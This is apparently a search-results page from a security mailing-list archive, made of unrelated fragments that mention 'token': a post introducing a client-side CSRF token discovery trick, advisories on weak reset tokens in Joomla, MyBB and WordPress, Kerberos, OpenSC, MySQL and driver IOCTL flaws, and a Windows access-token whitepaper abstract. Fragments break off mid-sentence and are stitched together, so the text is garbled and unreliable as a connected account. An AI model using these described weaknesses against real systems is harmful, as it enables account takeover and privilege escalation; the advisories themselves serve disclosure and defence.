Next Page >>
tokens
I was thinking about the problem of Cross Site Request Forgery and current mitigation strategies used in the Industry. In many of the real world applications I have tested so far, I see the use of random tokens appended as part of url. If the request fails to provide any token or provide a token with incorrect value, then the request is rejected. This prevents CSRF or any cross domain unauthorized function execution.
Uptil now, it was considered infeasible for an attacker to discover your CSRF token using Brute Force Attacks on the server.
The reasons being:
1. It generates lot of noise on the network and is slow. So most probably an IDS or Web App Firewall will pick up the malicious behavior and block your ip. For example, a Base16 CSRF token of length 5 characters (starting with a character) will generate approximately 393,216 requests.
2. Many applications are programmed to invalidate your session after it detects more than a certain number of requests with invalid token values. E.g. 30.
I am going to change this belief by showing you a technique to quicky find csrf tokens without generating alerts. This technique is a client side attack, so there is almost no network traffic generated and hence, your server and IDS/Web App Firewalls won’t notice it at all. This attack is based on the popular CSS History Hack found by Jeremiah Grossman 3 years ago.
could thus not only read sensitive information (SAM database for
example), but also write arbitrary content (disable passwords for
certain accounts, add new Administrator group users, etc.).
--- 7. Issue: Local DoS/privilege escalation by dereferencing invalid
pointer(s) used as parameter(s) for SetVistaTokenInformation() method
---
SABKUTIL.sys and SASKUTIL.sys use IOCTL code 0x9c4020c0
(IOCTL_SABKUTIL_SET_VISTA_TOKEN_INFORMATION) for writing arbitrary
information to the token of the current process.
return $this->trigger("cannot redefine built-in function '$matches[1]()'");
}
$args = explode(",", preg_replace("/\s+/", "", $matches[2])); // get the arguments
if (($stack = $this->nfx($matches[3])) === false) return false; // see if it can be converted to postfix
for ($i = 0; $i<count($stack); $i++) { // freeze the state of the non-argument variables
$token = $stack[$i];
if (preg_match('/^[a-z]\w*$/', $token) and !in_array($token, $args)) {
if (array_key_exists($token, $this->v)) {
$stack[$i] = $this->v[$token];
} else {
return $this->trigger("undefined variable '$token' in function definition");
can send a malformed UDP packet from any source IP address; they need not know
a valid game server's IP address to exploit this buffer overflow vulnerability.
When the client receives a UDP packet on port 27901 that specifies a server's
description (the server-to-client "print" message), it calls the function
M_AddToServerList(...)in \client\menu.c to tokenize the rest of the UDP packet
(status_string):
| void M_AddToServerList (netadr_t adr, char *status_string)
| {
| char *rLine;
www.sektioneins.de
-= Security Advisory =-
Advisory: Joomla Weak Random Password Reset Token Vulnerability
Release Date: 2008/09/11
Last Modified: 2008/09/11
Author: Stefan Esser [stefan.esser[at]sektioneins.de]
Application: Joomla <= 1.5.7
IMPACT
======
CVE-2010-1324
An unauthenticated remote attacker can forge GSS tokens that are
intended to be integrity-protected but unencrypted, if the targeted
pre-existing application session uses a DES session key.
An authenticated remote attacker can forge PACs if using a KDC that
does not filter client-provided PAC data. This can result in
discovered that this vulnerability can be used to reset the passwords
of users to a random string when user registration is activated
in the blog.
In addition to this it was discovered that Wordpress uses mt_rand()
to create passwords and reset tokens, which is not secure enough
for cryptographic secrets. The use of mt_rand() allows predicting
the randomly generated passwords when the PRNG is freshly seeded
and output of the PRNG is leaked to the user.
Combined this means on servers reusing PHP processes for multiple
Hey guys,
I recently got round to writing the whitepaper version of my Defcon 15 and CCC talk. For those who are interested, please find the abstract, PDF link and sourceforge link to the accompanying tool below: -
http://www.mwrinfosecurity.com/publications/mwri_security-implications-of-windows-access-tokens_2008-04-14.pdf
http://sourceforge.net/projects/incognito
ABSTRACT
This whitepaper discusses the security exposures that can occur due to the manner in which access tokens are implemented in the Microsoft® Windows Operating System. A brief overview of the intended function, design and implementation of Windows access tokens is given, followed by a discussion of the relevant security consequences of their design. More specific technical details are then given on how the features of Windows access tokens can be used to perform powerful post-exploitation functions during penetration testing, along with a basic methodology for including an assessment of the vulnerabilities exposed through tokens in a standard penetration test. Discussion is also included about why many corporate environments (assessed during penetration tests conducted by MWR InfoSecurity) have been found to not be operating in a manner which limits the risk of such issues. Finally, best practice advice is given on how to defend against these attacks.
Last Modified: 2010/04/13
Author: Stefan Esser [stefan.esser[at]sektioneins.de]
Application: MyBB <= 1.4.11
Severity: Usage of weak random number generation in password reset
functionality allows predicting the password reset token
and the randomly generated password, which results in
account takeover.
Risk: Critical
Vendor Status: MyBB 1.4.12 was released which partly fixes this
vulnerability
See http://www.owasp.org/index.php/Cross-Site_Request_Forgery for more details.
Good info @ http://www.cgisecurity.com/articles/csrf-faq.shtml as well:
"The most popular suggestion to preventing CSRF involves appending challenge tokens to each request. It is important to state that this challenge token MUST be associated with the user session, otherwise an attacker may be able to fetch a valid token on their own and utilize it in an attack. In addition to being tied to the user session it is important to limit the time peroid to which a token is valid. This method is documented in multiple documents however as pointed out in mailing list postings an attacker can utilize an existing browser vulnerability or XSS flaw to grab this session token."
The fact is, as long as one of these situations is available, the exploit can be auto-pwn:
1) The tab is open somewhere on the browser.
2) The session is still active in the browser.
+------------------------------------------------------------------------+
| Discussion | A lot of time was spent trying to come up with a way to |
| | resolve this issue in a way that was completely backwards |
| | compatible. However, the final resolution ended up |
| | requiring a modification to the IAX2 protocol. This |
| | modification is referred to as call token validation. |
| | Call token validation is used as a handshake before call |
| | numbers are assigned to IAX2 connections. |
| | |
| | Call token validation by itself does not resolve the |
| | issue. However, it does allow an IAX2 server to validate |
Summary:
A) Reflected XSS
B) Password field with autocomplete enabled
C) Disclosure of Session Tokens in URL
A) Reflected XSS
The presence of the Cross Site Scripting plague has been veryfied on
This alone isn't enough since forms can be auto-submitted by js that
are irrespective of the same-orgin policy.
Proper remediation should include referer checking (has proved to be
spoofable on the client side in the past so not a bulletproof
technique) and token checking (a random string or an hash generated
when the user requires the frontend, stored serverside - sessions are
okay -, included in the frontend form and sent to and verified by the
backend).
These two protections ensure that an action cannot, hopefully, be
Information Leakage, Directory Traversal, Arbitrary File Deletion and Denial
of Service vulnerabilities in WordPress.
For all these attacks it's needed to have access to admin account, or to
have account with rights for working with plugins. Or to attack admin or
other user with required rights via XSS, to find out token which designed to
protect against CSRF attacks.
So users of WordPress don't need to worry much about these holes (if to not
allow above-mentioned requirements). But these vulnerabilities will come in
useful to security researchers at access to admin panel or at existence of
Secunia Research has discovered a vulnerability in certain Trend Micro
products, which can be exploited by malicious people to bypass
authentication.
The vulnerability is caused by insufficient entropy being used to
create a random session token for identifying an authenticated
manager using the web management console. The entropy in the session
token comes solely from the system time when the real manager logs in
with a granularity of one second. This can be exploited to
impersonate a currently logged on manager by brute forcing the
authentication token.
> do have use beyond surfing adult-content).
>
>
> > To tell you the truth,
> > the original motivation was just that it's not a
> > good idea to have a valid authentication token
> > (the file retrievel session ID) embedded in a URL.
>
> Sure, it can show up in logs, referer, etc. If
> you don't mind JavaScript, it's easy enough to
> use JavaScript to submit a POST.
With this bug anyone can change a user PIN without having the PIN or PUK
or the superusers PIN or PUK. However it can not be used to figure out the
PIN. If the PIN on your card is still the same you always had, there's a
reasonable chance that this vulnerability has not been exploited.
This vulnerability affects only smart cards and USB crypto tokens based on
Siemens CardOS M4, and within that group only those that were initialised
with OpenSC. Users of other smart cards and USB crypto tokens, or cards
that have been initialised with some software other than OpenSC, are not
affected.
Problem Description:
Multiple vulnerabilities has been found and corrected in mysql:
MySQL 5.0 before 5.0.66, 5.1 before 5.1.26, and 6.0 before 6.0.6
does not properly handle a b'' (b single-quote single-quote) token,
aka an empty bit-string literal, which allows remote attackers to
cause a denial of service (daemon crash) by using this token in a
SQL statement (CVE-2008-3963).
MySQL 5.0.51a allows local users to bypass certain privilege checks by
having the PIN or PUK, or the superuser's PIN or PUK (CVE-2008-2235).
Please note that this issue can not be used to discover the PIN on
a card. If the PIN on a card is the same that was always there,
it is unlikely that this vulnerability has been exploited. As well,
this issue only affects smart cards and USB crypto tokens based on
Siemens CardOS M4, and then only those devices that were initialized
by OpenSC. Users of other smart cards or USB crypto tokens, or cards
that were not initialized by OpenSC, are not affected.
After applying the update, executing 'pkcs15-tool -T' will indicate
Report Confidence: Confirmed
SUMMARY
=======
Certain invalid GSS-API tokens can cause a GSS-API acceptor (server)
to crash due to a null pointer dereference in the GSS-API library.
This is an implementation vulnerability in MIT krb5, and not a
vulnerability in the Kerberos protocol.
An unauthenticated remote attacker could alter a SAM-2 challenge,
affecting the prompt text seen by the user or the kind of response
sent to the KDC. Under some circumstances, this can negate the
incremental security benefit of using a single-use authentication
mechanism token. An unauthenticated remote attacker has a 1/256
chance of forging KRB-SAFE messages in an application protocol if the
targeted pre-existing session uses an RC4 session key. Few application
protocols use KRB-SAFE messages (CVE-2010-1323).
An unauthenticated remote attacker can forge GSS tokens that
With this bug anyone can change a user PIN without having the PIN or PUK
or the superusers PIN or PUK. However it can not be used to figure out the
PIN. If the PIN on your card is still the same you always had, there's a
resonable chance that this vulnerability has not been exploited.
This vulnerability affects only smart cards and USB crypto tokens based on
Siemens CardOS M4, and within that group only those that were initialised
with OpenSC. Users of other smart cards and USB crypto tokens, or cards
that have been initialised with some software other than OpenSC, are not
affected.
Problem Description:
Multiple vulnerabilities has been found and corrected in mysql:
MySQL 5.0 before 5.0.66, 5.1 before 5.1.26, and 6.0 before 6.0.6
does not properly handle a b'' (b single-quote single-quote) token,
aka an empty bit-string literal, which allows remote attackers to
cause a denial of service (daemon crash) by using this token in a
SQL statement (CVE-2008-3963).
MySQL before 5.0.67 allows local users to bypass certain privilege
you're right, the file is likely to be in the
stolen laptop. If the browser displayed the file
and the user takes no precautions, the file should
be in the browser's cache. To tell you the truth,
the original motivation was just that it's not a
good idea to have a valid authentication token
(the file retrievel session ID) embedded in a URL.
The stolen laptop scenario was an afterthought.
(There is also a more exotic scenario: the
attacker reads the authentication token from the
user's computer display, as it is shown in the
Bugzilla is a Web-based bug-tracking system, used by a large number of
software projects.
Bugzilla 3.2.1, 3.0.7, and 3.3.2, when running under mod_perl,
generated insufficiently random numbers, resulting in all random
tokens being the same, all CSRF protection being defeated, and the
new attachment_base functionality being compromised. Only these
releases were affected--earlier releases are not affected.
All affected installations are encouraged to upgrade as soon as
possible.
/?m=Profile&func=get_raw_blog_entry&user_id=<user_id>&ajax=1&store=0&ajax_target=none
HTTP/1.1
Host: wwwb21.tuenti.com
...
blog_entry_id=<blog_entry_id>&csfr=<token>
where:
- <user_id> = id of the authenticated user
- <blog_entry_id> = id of the blog entry requested by the
authenticated user
http://www.debian.org/security/ Luciano Bello
August 12, 2010 http://www.debian.org/security/faq
- ------------------------------------------------------------------------
Package : squirrelmail
Vulnerability : No user-specific token implemented
Problem type : remote
Debian-specific: no
Debian bug : 543818
CVE ID : CVE-2009-2964 CVE-2010-2813
1) An unsafe call to "sscanf()" when parsing the "ENCODING" attribute
of the "*BEGIN" tag can be exploited to cause a stack-based buffer
overflow.
2) A boundary error when parsing overly long tokens from the input
file can be exploited to cause a heap-based buffer overflow.
3) A boundary error when parsing the initial "*BEGIN" tag can be
exploited to cause stack-based buffer overflow.
---
[*] Cross-Site Request Forgery (CSRF):
All the forms on the admin panel it's vulnerable to CSRF because of the lack of security tokens to
check if the administrator really wants to do those actions. Without a token an attacker can create
a new user as admin or change the administrator passwords and other personal data. Another type of
action can be done with a simple bbcode [img] tag. When the administrator see the [img] tag with a
special crafted URL, an action, such as delete a topic, could be executed.
A more dangerous attack can lead to JavaScript execution.
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
TSRM/tsrm_virtual_cwd.c-619: tok=NULL;
TSRM/tsrm_virtual_cwd.c-620: ptr = tsrm_strtok_r(path_copy,
TOKENIZER_STRING, &tok);
TSRM/tsrm_virtual_cwd.c-621: while (ptr) {
TSRM/tsrm_virtual_cwd.c-622: ptr_length = strlen(ptr);
[..]
TSRM/tsrm_virtual_cwd.c-624: if (IS_DIRECTORY_UP(ptr, ptr_length)) {
[..]
Next Page>>
|
